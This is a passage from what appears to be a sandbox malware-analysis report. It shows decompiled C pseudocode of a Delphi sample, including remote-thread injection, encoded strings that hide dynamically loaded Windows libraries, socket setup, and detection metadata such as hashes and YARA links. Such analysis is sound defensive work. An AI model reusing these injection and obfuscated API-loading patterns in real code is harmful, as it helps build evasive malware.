					_push(0);
					_push( &_v293);
					_t63 = _v12;
					_push(_t63);
					L004012CC();
					if(_t63 != 0) {
						_push( &_v28);
						_push( &_v22);
						_push(0);
						_push(0);
						_push(E00406010);
						_t68 = _v12;
						_push(_t68);
						L004012CC();
						if(_t68 != 0) {
							_v22 = 0;
						}
					}
					_v18 = 0;
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(0x405e9b);
					_t65 = _v12;
					_push(_t65);
					L004012BC();
					return _t65;
				} else {
					_t69 =  &_v12;
					_push(_t69);
					_push(0xf0019);
					_push(0);
					_push("Software\\Borland\\Locales");
					_push(0x80000002);
					L004012C4();
					if(_t69 == 0) {
						goto L3;
					} else {
						_t70 =  &_v12;
						_push(_t70);
						_push(0xf0019);
						_push(0);
						_push("Software\\Borland\\Delphi\\Locales");
						_push(0x80000001);
						L004012C4();
						if(_t70 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v293);
							L004012A4();
							_push(5);
							_t73 =  &_v17;
							_push(_t73);
							_push(3);
							L0040128C();
							_push(_t73); // executed
							L00401264(); // executed
							_t98 = 0;
							if(_v293 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t75 =  &_v293;
								_push(_t75);
								L004012AC();
								_v32 = _t75 +  &_v293;
								while( *_v32 != 0x2e &&  &_v293 != _v32) {
									_v32 = _v32 - 1;
								}
								_t78 =  &_v293;
								if(_t78 != _v32) {
									_v32 = _v32 + 1;
									if(_v22 != 0) {
										_push(0x105 - _v32 - _t78);
										_push( &_v22);
										_push(_v32);
										L004012A4();
										_push(2);
										_push(0);
										_t95 =  &_v293;
										_push(_t95);
										L00401294();
										_t98 = _t95;
									}
									if(_t98 == 0 && _v17 != 0) {
										_push(0x105 - _v32 -  &_v293);
										_push( &_v17);
										_push(_v32);
										L004012A4();
										_push(2);
										_push(0);
										_t84 =  &_v293;
										_push(_t84); // executed
										L00401294(); // executed
										_t98 = _t84;
										if(_t98 == 0) {
											_v15 = 0;
											_push(0x105 - _v32 -  &_v293);
											_push( &_v17);
											_push(_v32);
											L004012A4();
											_push(2);
											_push(0);
											_t90 =  &_v293;
											_push(_t90); // executed
											L00401294(); // executed
											_t98 = _t90;
										}
									}
								}
							}
							return _t98;
						} else {
							goto L3;
						}
					}
				}
			}





























                                                          0x00405d91
                                                          0x00405d93
                                                          0x00405d9a
                                                          0x00405d9d
                                                          0x00405da8
                                                          0x00405da9
                                                          0x00405dab
                                                          0x00405db0
                                                          0x00405db4
                                                          0x00405db7
                                                          0x00405db8
                                                          0x00405dbd
                                                          0x00405dbf
                                                          0x00405dc4
                                                          0x00405dc9
                                                          0x00405dd0
                                                          0x00405e12
                                                          0x00405e14
                                                          0x00405e15
                                                          0x00405e1a
                                                          0x00405e1d
                                                          0x00405e20
                                                          0x00405e32
                                                          0x00405e3a
                                                          0x00405e3e
                                                          0x00405e3f
                                                          0x00405e41
                                                          0x00405e49
                                                          0x00405e4a
                                                          0x00405e4d
                                                          0x00405e4e
                                                          0x00405e55
                                                          0x00405e5a
                                                          0x00405e5e
                                                          0x00405e5f
                                                          0x00405e61
                                                          0x00405e63
                                                          0x00405e68
                                                          0x00405e6b
                                                          0x00405e6c
                                                          0x00405e73
                                                          0x00405e75
                                                          0x00405e75
                                                          0x00405e73
                                                          0x00405e79
                                                          0x00405e7f
                                                          0x00405e82
                                                          0x00405e85
                                                          0x00405e8a
                                                          0x00405e8d
                                                          0x00405e8e
                                                          0x00405e93
                                                          0x00405dd2
                                                          0x00405dd2
                                                          0x00405dd5
                                                          0x00405dd6
                                                          0x00405ddb
                                                          0x00405ddd
                                                          0x00405de2
                                                          0x00405de7
                                                          0x00405dee
                                                          0x00000000
                                                          0x00405df0
                                                          0x00405df0
                                                          0x00405df3
                                                          0x00405df4
                                                          0x00405df9
                                                          0x00405dfb
                                                          0x00405e00
                                                          0x00405e05
                                                          0x00405e0c
                                                          0x00405e9b
                                                          0x00405ea3
                                                          0x00405eaa
                                                          0x00405eab
                                                          0x00405eb0
                                                          0x00405eb2
                                                          0x00405eb5
                                                          0x00405eb6
                                                          0x00405eb8
                                                          0x00405ebd
                                                          0x00405ebe
                                                          0x00405ec3
                                                          0x00405ecc
                                                          0x00405ee2
                                                          0x00405ee8
                                                          0x00405ee9
                                                          0x00405ef6
                                                          0x00405efe
                                                          0x00405efb
                                                          0x00405efb
                                                          0x00405f11
                                                          0x00405f1a
                                                          0x00405f20
                                                          0x00405f27
                                                          0x00405f35
                                                          0x00405f39
                                                          0x00405f3d
                                                          0x00405f3e
                                                          0x00405f43
                                                          0x00405f45
                                                          0x00405f47
                                                          0x00405f4d
                                                          0x00405f4e
                                                          0x00405f53
                                                          0x00405f53
                                                          0x00405f57
                                                          0x00405f71
                                                          0x00405f75
                                                          0x00405f79
                                                          0x00405f7a
                                                          0x00405f7f
                                                          0x00405f81
                                                          0x00405f83
                                                          0x00405f89
                                                          0x00405f8a
                                                          0x00405f8f
                                                          0x00405f93
                                                          0x00405f95
                                                          0x00405fab
                                                          0x00405faf
                                                          0x00405fb3
                                                          0x00405fb4
                                                          0x00405fb9
                                                          0x00405fbb
                                                          0x00405fbd
                                                          0x00405fc3
                                                          0x00405fc4
                                                          0x00405fc9
                                                          0x00405fc9
                                                          0x00405f93
                                                          0x00405f57
                                                          0x00405f1a
                                                          0x00405fd1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e0c
                                                          0x00405dee

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                          • API String ID: 0-2375825460
                                                          • Opcode ID: 76ac0e89c027f59c30c75084f5d6946d4f2fb264631676b9ee32f3a8e279c80b
                                                          • Instruction ID: 4161aafb646a41738e94a827faff96e70000a86aab9d96329987de3ce5b78809
                                                          • Opcode Fuzzy Hash: 76ac0e89c027f59c30c75084f5d6946d4f2fb264631676b9ee32f3a8e279c80b
                                                          • Instruction Fuzzy Hash: EA612B75A046497EEB10DAE5CC46FEFB7BCDB08704F4040B6A644F61C1D6BC9A458BA8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00432F64 Relevance: 1.5, APIs: 1, Instructions: 17processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00432F64(int __eax, int __edx) {
				void* _t4;
				int _t5;

				_t5 = __eax;
				if(E00432CE8(__eax) == 0) {
					return 0;
				} else {
					_t4 = CreateToolhelp32Snapshot(_t5, __edx); // executed
					return _t4;
				}
			}





                                                          0x00432f68
                                                          0x00432f71
                                                          0x00432f82
                                                          0x00432f73
                                                          0x00432f75
                                                          0x00432f7d
                                                          0x00432f7d

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000,?,?,0045394C,00000000,00453A29,?,?,?,?,?,00451AF1,00000000,004520F1), ref: 00432F75
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 3332741929-0
                                                          • Opcode ID: 733397445a262a148621dee03f2eecfeabb97f64792a6ceb650574993d51690f
                                                          • Instruction ID: 441394c59263b91a7345582c66c5c8aac05b507405de6dc1346df3a78ef199f2
                                                          • Opcode Fuzzy Hash: 733397445a262a148621dee03f2eecfeabb97f64792a6ceb650574993d51690f
                                                          • Instruction Fuzzy Hash: 3BC08072203220574A1066F93E844C7674DDD4D1F770414B3F508D3111D2A94C0051D4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004089B0 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E004089B0(void* __eax) {
				char _v6;
				char _v8;
				char _v16;
				char _v316;
				signed char _v336;
				void* _t15;
				char* _t21;

				_push( &_v336);
				_t15 = E004049DC(__eax);
				_push(_t15); // executed
				L00406AD0(); // executed
				if(_t15 == 0xffffffff) {
					L3:
					_v8 = 0xffffffff;
				} else {
					_push(_t15);
					L00406AC8();
					if((_v336 & 0x00000010) != 0) {
						goto L3;
					} else {
						_push( &_v16);
						_push( &_v316);
						L00406AC0();
						_push( &_v8);
						_push( &_v6);
						_t21 =  &_v16;
						_push(_t21);
						L00406AB8();
						if(_t21 == 0) {
							goto L3;
						}
					}
				}
				return _v8;
			}










                                                          0x004089c2
                                                          0x004089c5
                                                          0x004089ca
                                                          0x004089cb
                                                          0x004089d3
                                                          0x00408a09
                                                          0x00408a09
                                                          0x004089d5
                                                          0x004089d5
                                                          0x004089d6
                                                          0x004089e2
                                                          0x00000000
                                                          0x004089e4
                                                          0x004089e7
                                                          0x004089ee
                                                          0x004089ef
                                                          0x004089f7
                                                          0x004089fb
                                                          0x004089fc
                                                          0x004089ff
                                                          0x00408a00
                                                          0x00408a07
                                                          0x00000000
                                                          0x00000000
                                                          0x00408a07
                                                          0x004089e2
                                                          0x00408a17

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02273a2473c25eba7cfda50f82d8c7b30cd6e519b0584f8d3b0c9db99afcf0a7
                                                          • Instruction ID: f259f0587b9190be05b10604731cac30839b57d2bbc0c547e791ddb3aae5eec2
                                                          • Opcode Fuzzy Hash: 02273a2473c25eba7cfda50f82d8c7b30cd6e519b0584f8d3b0c9db99afcf0a7
                                                          • Instruction Fuzzy Hash: 31F06871E0020C66CB10FAF58D859CF73AC5B05324F0046BBB516F31C2EA389B184F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00408AB8 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 83%
                                                          			E00408AB8(void* __eax, void* __ecx, signed int __edx) {
				intOrPtr _t7;
				void* _t13;
				intOrPtr _t19;
				intOrPtr _t20;

				_t13 = __ecx;
				 *(__ecx + 0x10) =  !__edx & 0x0000001e;
				_push(__ecx + 0x18);
				_t7 = E004049DC(__eax);
				_push(_t7); // executed
				L00406AD0(); // executed
				_t19 = _t7;
				 *((intOrPtr*)(__ecx + 0x14)) = _t19;
				if(_t19 == 0xffffffff) {
					L00406B70();
					_t20 = _t7;
				} else {
					_t20 = E00408A4C(__ecx);
					if(_t20 != 0) {
						E00408B08(_t13);
					}
				}
				return _t20;
			}







                                                          0x00408abb
                                                          0x00408ac4
                                                          0x00408aca
                                                          0x00408acd
                                                          0x00408ad2
                                                          0x00408ad3
                                                          0x00408ad8
                                                          0x00408ada
                                                          0x00408ae0
                                                          0x00408af8
                                                          0x00408afd
                                                          0x00408ae2
                                                          0x00408ae9
                                                          0x00408aed
                                                          0x00408af1
                                                          0x00408af1
                                                          0x00408aed
                                                          0x00408b04

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d10b05cbd45f92be0d39b7577bcf61463cce2fc500189306f03d1bcc4dd3fa9c
                                                          • Instruction ID: b97388968554a38406bd61a2b92880eb75e2f1923efb552beec36330594efac2
                                                          • Opcode Fuzzy Hash: d10b05cbd45f92be0d39b7577bcf61463cce2fc500189306f03d1bcc4dd3fa9c
                                                          • Instruction Fuzzy Hash: 8EE06DB2B012200BC714BEBE5D8155B65988A847B4309027FB955FB7C7DE7CCC125BD8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00451190 Relevance: .0, Instructions: 32COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 80%
                                                          			E00451190(intOrPtr* __eax, void* __ecx) {
				char _v264;
				char _v272;
				char* _t5;
				intOrPtr* _t22;

				_t22 =  &_v264;
				_t14 = __eax;
				if( *((intOrPtr*)( *0x46eea8)) == 0) {
					 *_t22 = 0x101;
					_push(_t22);
					_t5 =  &_v264;
					_push(_t5); // executed
					L00406A38(); // executed
					if(_t5 == 0) {
						E00404500(__eax);
					} else {
						E00404B0C(__eax,  *_t22 - 1);
					}
					return E00404770(_t14, 0x101,  &_v272);
				}
				return E00404554(__eax,  *((intOrPtr*)( *0x46eea8)));
			}







                                                          0x00451191
                                                          0x00451197
                                                          0x004511a1
                                                          0x004511b4
                                                          0x004511bb
                                                          0x004511bc
                                                          0x004511c0
                                                          0x004511c1
                                                          0x004511c8
                                                          0x004511d9
                                                          0x004511ca
                                                          0x004511d0
                                                          0x004511d0
                                                          0x00000000
                                                          0x004511e9
                                                          0x00000000

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d47540d9bd3baafff8c38723ecf78aeed3153fa4359a83e1ecaff3ea5f2966e4
                                                          • Instruction ID: d62d6f790af639b0246b6a1af51f328c3d488a4fcc2064ade4d8be2eb8e36490
                                                          • Opcode Fuzzy Hash: d47540d9bd3baafff8c38723ecf78aeed3153fa4359a83e1ecaff3ea5f2966e4
                                                          • Instruction Fuzzy Hash: A8F0B4753001006BC300FA6ADC81B9673E59B89305F04453EBA85973A2EBBDDC89974A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004517BC Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004517BC() {
				intOrPtr _v20;

				L00406BB8(); // executed
				return _v20;
			}




                                                          0x004517c0
                                                          0x004517cc

                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d7fc2f88f9f435fc4a24b3998b04bb3cb65d64b0ddd0e5d387d14baff089bb51
                                                          • Instruction ID: 65f6c7b149dcbbfe471bcd5a2b1ff86d70ebb976ed11110e6e5b5f892fbfa128
                                                          • Opcode Fuzzy Hash: d7fc2f88f9f435fc4a24b3998b04bb3cb65d64b0ddd0e5d387d14baff089bb51
                                                          • Instruction Fuzzy Hash: 13A012504084000AC404A7194C4340F32981941214FC40264749DF53C2E619967403DB
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045A730 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 79libraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          C-Code - Quality: 45%
                                                          			E0045A730(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				struct HINSTANCE__* _t22;
				void* _t54;
				intOrPtr _t55;
				void* _t59;
				intOrPtr _t61;

				 *[fs:eax] = _t61;
				L00406B90();
				 *0x470fa4 = 0;
				 *0x470f9c = L00406B98;
				L00455C58("c0SDpiKvxEnDhE6Y",  &_v8);
				 *0x470f98 =  *0x470f9c( *0x470fa4, E004049DC(_v8), "kernel32.dll",  *[fs:eax], 0x45a834, _t61, __ebx, 0, 0, 0, 0, 0, 0, _t59);
				_t22 = LoadLibraryA("Urlmon.dll"); // executed
				 *0x470fac = _t22;
				 *0x470fa0 =  *0x470f98("user32.dll");
				 *0x470fa8 =  *0x470f98("Advapi32.dll");
				 *0x470fb0 =  *0x470f98("Shell32.dll");
				 *0x470fb4 =  *0x470f98("ntdll.dll");
				E0045A680( &_v16, __esi);
				E00408158(_v16, 0,  &_v12);
				_push(_v12);
				L00455C58("hPnVpbnD+HZDF0i",  &_v20);
				_pop(_t54);
				if(E00404AC4(_v20, _t54) > 0) {
					E0045A680( &_v28, __esi);
					E00408C1C(_v28, 0,  &_v24);
					E0045ABB8(E004049DC(_v24), 0x470f98);
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(0x45a83b);
				return E00404524( &_v28, 6);
			}














                                                          0x0045a74c
                                                          0x0045a754
                                                          0x0045a759
                                                          0x0045a763
                                                          0x0045a770
                                                          0x0045a78a
                                                          0x0045a791
                                                          0x0045a793
                                                          0x0045a79f
                                                          0x0045a7ab
                                                          0x0045a7b7
                                                          0x0045a7c3
                                                          0x0045a7cb
                                                          0x0045a7d6
                                                          0x0045a7de
                                                          0x0045a7e7
                                                          0x0045a7ef
                                                          0x0045a7f7
                                                          0x0045a7fc
                                                          0x0045a807
                                                          0x0045a814
                                                          0x0045a814
                                                          0x0045a81b
                                                          0x0045a81e
                                                          0x0045a821
                                                          0x0045a833

                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(Urlmon.dll,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045A791
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: Advapi32.dll$Shell32.dll$Urlmon.dll$c0SDpiKvxEnDhE6Y$hPnVpbnD+HZDF0i$kernel32.dll$ntdll.dll$user32.dll
                                                          • API String ID: 1029625771-904844578
                                                          • Opcode ID: 953c7499bacdc6838976175f7a58c61cc882fb27326cc90128f42f89926a452e
                                                          • Instruction ID: 6bbf18412a218639c5176dab177573abf56b07266dd18c0e4c0bf412ab12914d
                                                          • Opcode Fuzzy Hash: 953c7499bacdc6838976175f7a58c61cc882fb27326cc90128f42f89926a452e
                                                          • Instruction Fuzzy Hash: B5218DB0600205DFDB10FFA5C84696E7BB4EB49305B50453BF904E7392DBB86919CB6A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0042C7D8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72networkCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E0042C7D8(void* __edx, void* __ebp, void* __eflags) {
				signed short _v40;
				void* __ebx;
				void* __esi;
				void* _t24;
				signed int _t26;
				intOrPtr _t35;
				intOrPtr* _t53;
				intOrPtr _t68;
				void* _t71;

				_t53 = memcpy(_t71, __edx, 7 << 2);
				 *((char*)(_t53 + 0x1a8)) = 0;
				 *((intOrPtr*)(_t53 + 0x19c)) = 0;
				 *((intOrPtr*)(_t53 + 0x1a0)) = 0;
				_t24 = L0042DB4C(_t53);
				if( *((intOrPtr*)(_t53 + 0x1b8)) == 0xffffffff) {
					_t26 = E00404500(_t53 + 0x6c);
					 *((char*)(_t53 + 0x8b)) = 0;
					 *((char*)(_t53 + 0x8e)) = _t26 & 0xffffff00 | _v40 == 0x00000017;
					_t35 =  *((intOrPtr*)( *((intOrPtr*)( *0x46edac))))(_v40 & 0x0000ffff,  *((intOrPtr*)( *_t53 + 0xac))( *((intOrPtr*)( *_t53 + 0xb0))())); // executed
					_t68 = _t35;
					 *((intOrPtr*)(_t53 + 0x1b8)) = _t68;
					_t69 = _t68 + 1;
					if(_t68 + 1 == 0) {
						 *((intOrPtr*)(_t53 + 0x1bc)) =  *((intOrPtr*)( *((intOrPtr*)( *0x46f098))))();
					}
					E004280DC(_t53 + 0x98);
					E004280CC( *((intOrPtr*)(_t53 + 0x1b8)), _t53 + 0x98);
					L0042DBDC(_t53, _t53, _t69);
					if( *((char*)(_t53 + 0x8e)) == 0) {
						E0042E528(_t53, 0x42c8ec, 2);
					} else {
						E0042E528(_t53, 0x42c8dc, 2);
					}
					E0042C5FC(_t53);
					return E0042E5E0(_t53);
				}
				return _t24;
			}












                                                          0x0042c7ea
                                                          0x0042c7ec
                                                          0x0042c7f5
                                                          0x0042c7fd
                                                          0x0042c805
                                                          0x0042c811
                                                          0x0042c81a
                                                          0x0042c81f
                                                          0x0042c82e
                                                          0x0042c857
                                                          0x0042c859
                                                          0x0042c85b
                                                          0x0042c861
                                                          0x0042c862
                                                          0x0042c86d
                                                          0x0042c86d
                                                          0x0042c879
                                                          0x0042c88a
                                                          0x0042c891
                                                          0x0042c89d
                                                          0x0042c8b8
                                                          0x0042c89f
                                                          0x0042c8a8
                                                          0x0042c8a8
                                                          0x0042c8bf
                                                          0x00000000
                                                          0x0042c8c6
                                                          0x0042c8d1

                                                          APIs
                                                          • socket.WS2_32(?,00000000), ref: 0042C857
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: socket
                                                          • String ID: IPv4$IPv6
                                                          • API String ID: 98920635-3648194996
                                                          • Opcode ID: 1a41851a1eb0b24a2aa6360a3adb8c0896534a2a81217a1e90fc9d0d6a4b39f1
                                                          • Instruction ID: 1637d47d46f8d72e1445dd2501cfa02ef1482c8825976e76a7a7ae75c54e74c3
                                                          • Opcode Fuzzy Hash: 1a41851a1eb0b24a2aa6360a3adb8c0896534a2a81217a1e90fc9d0d6a4b39f1
                                                          • Instruction Fuzzy Hash: EB213B317042109FC740EF69E8C078A37D5AF45315F4885BAA989CF357EB789948CB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045CB08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47threadinjectionCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E0045CB08(void* __eax, void* __ebx, long __ecx, struct _SECURITY_ATTRIBUTES* __edx, void* __esi, DWORD* _a4, long _a8, void* _a12, _Unknown_base(*)()* _a16) {
				long _v8;
				char _v12;
				void* _t25;
				intOrPtr _t37;
				struct _SECURITY_ATTRIBUTES* _t39;
				void* _t40;
				void* _t42;

				_v12 = 0;
				_v8 = __ecx;
				_t39 = __edx;
				_t25 = __eax;
				 *[fs:eax] = _t42 + 0xfffffff8;
				L00455C58("7bn6x5Z6jaWX+bZ6W0DlpHNu",  &_v12);
				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45cb7c, _t42, __esi, __ebx, _t40);
				CreateRemoteThread(_t25, _t39, _v8, _a16, _a12, _a8, _a4); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E0045CB83);
				return E00404500( &_v12);
			}










                                                          0x0045cb12
                                                          0x0045cb15
                                                          0x0045cb18
                                                          0x0045cb1a
                                                          0x0045cb27
                                                          0x0045cb32
                                                          0x0045cb46
                                                          0x0045cb62
                                                          0x0045cb68
                                                          0x0045cb6b
                                                          0x0045cb6e
                                                          0x0045cb7b

                                                          APIs
                                                          • CreateRemoteThread.KERNELBASE(0A74C085,00000000,?,?,?,?,?,?,0043B3C0,0A74C085), ref: 0045CB62
                                                          Strings
                                                          • 7bn6x5Z6jaWX+bZ6W0DlpHNu, xrefs: 0045CB2D
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CreateRemoteThread
                                                          • String ID: 7bn6x5Z6jaWX+bZ6W0DlpHNu
                                                          • API String ID: 4286614544-3393271841
                                                          • Opcode ID: 9dd976c75394f38078006362e8e1e35470d6d281ef003629406f35a042f9415a
                                                          • Instruction ID: 0b73c443149c3b52f054c5c2eb42313dac5cdfa5de45c38fbae08b498ba9eb4f
                                                          • Opcode Fuzzy Hash: 9dd976c75394f38078006362e8e1e35470d6d281ef003629406f35a042f9415a
                                                          • Instruction Fuzzy Hash: 3F0121B5600608BFC710DFA9DC81C9FBBBDEBCD710B518579B918D3251E674AD008AA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045BE58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47fileCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E0045BE58(CHAR* __eax, void* __ebx, long __ecx, long __edx, void* __esi, void* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16) {
				long _v8;
				char _v12;
				CHAR* _t25;
				intOrPtr _t37;
				long _t39;
				void* _t40;
				void* _t42;

				_v12 = 0;
				_v8 = __ecx;
				_t39 = __edx;
				_t25 = __eax;
				 *[fs:eax] = _t42 + 0xfffffff8;
				L00455C58("7bn6x5Z6Za6opji",  &_v12);
				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45becc, _t42, __esi, __ebx, _t40);
				CreateFileA(_t25, _t39, _v8, _a16, _a12, _a8, _a4); // executed
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x45bed3);
				return E00404500( &_v12);
			}










                                                          0x0045be62
                                                          0x0045be65
                                                          0x0045be68
                                                          0x0045be6a
                                                          0x0045be77
                                                          0x0045be82
                                                          0x0045be96
                                                          0x0045beb2
                                                          0x0045beb8
                                                          0x0045bebb
                                                          0x0045bebe
                                                          0x0045becb

                                                          APIs
                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000000,?,?,?,?,?,?,?), ref: 0045BEB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: 7bn6x5Z6Za6opji
                                                          • API String ID: 823142352-2055617166
                                                          • Opcode ID: a8c5a6bacb14361f408869c79cb8e8f9a7da43167d264fe132cf4b6c52064880
                                                          • Instruction ID: 9dfec613dcd4ad1ce01370a7b6527e25b2a137a6dbc302fe48281c6108339ee1
                                                          • Opcode Fuzzy Hash: a8c5a6bacb14361f408869c79cb8e8f9a7da43167d264fe132cf4b6c52064880
                                                          • Instruction Fuzzy Hash: A20121B5600608BF8710DFA9DC81C9BBBBDEFCD710B518579BA18D3251E7749D008AA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045C584 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 61%
                                                          			E0045C584(intOrPtr __eax, void* __ebx) {
				intOrPtr _v8;
				char _v12;
				signed char _t22;
				intOrPtr _t34;
				void* _t36;
				void* _t38;

				_v12 = 0;
				_v8 = __eax;
				E004049CC(_v8);
				 *[fs:eax] = _t38 + 0xfffffff8;
				L00455C58("ZqWeZa6opjNeFPnvxEWep58Y",  &_v12);
				 *0x470f9c( *0x470fa4, E004049DC(_v12),  *[fs:eax], 0x45c602, _t38, __ebx, _t36);
				_t22 = GetFileAttributesA(E004049DC(_v8)); // executed
				if(_t22 == 0xffffffff || (_t22 & 0x00000010) == 0) {
				}
				_pop(_t34);
				 *[fs:eax] = _t34;
				_push(E0045C609);
				return E00404524( &_v12, 2);
			}









                                                          0x0045c58d
                                                          0x0045c590
                                                          0x0045c596
                                                          0x0045c5a6
                                                          0x0045c5b1
                                                          0x0045c5c5
                                                          0x0045c5d6
                                                          0x0045c5db
                                                          0x0045c5db
                                                          0x0045c5e9
                                                          0x0045c5ec
                                                          0x0045c5ef
                                                          0x0045c601

                                                          APIs
                                                          • GetFileAttributesA.KERNELBASE(00000000,?,?), ref: 0045C5D6
                                                          Strings
                                                          • ZqWeZa6opjNeFPnvxEWep58Y, xrefs: 0045C5AC
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.613706650.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_cmd.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID: ZqWeZa6opjNeFPnvxEWep58Y
                                                          • API String ID: 3188754299-2668179521
                                                          • Opcode ID: 0d770fc5c2ad62fadf51dfbf5e437209ca7d868002b8a2e18e370dfca16c24bc
                                                          • Instruction ID: 36b71e0d0722648a5017349291098b20cf503f95275dc929e2820dfd37fa5c3b
                                                          • Opcode Fuzzy Hash: 0d770fc5c2ad62fadf51dfbf5e437209ca7d868002b8a2e18e370dfca16c24bc
                                                          • Instruction Fuzzy Hash: 9601A7B0604308AFCB10EBF9CC9295EB7A8DB89315B504576F908F3692E6386E04C658
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0045A8C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45fileCOMMON
                                                          Download Yara Rule
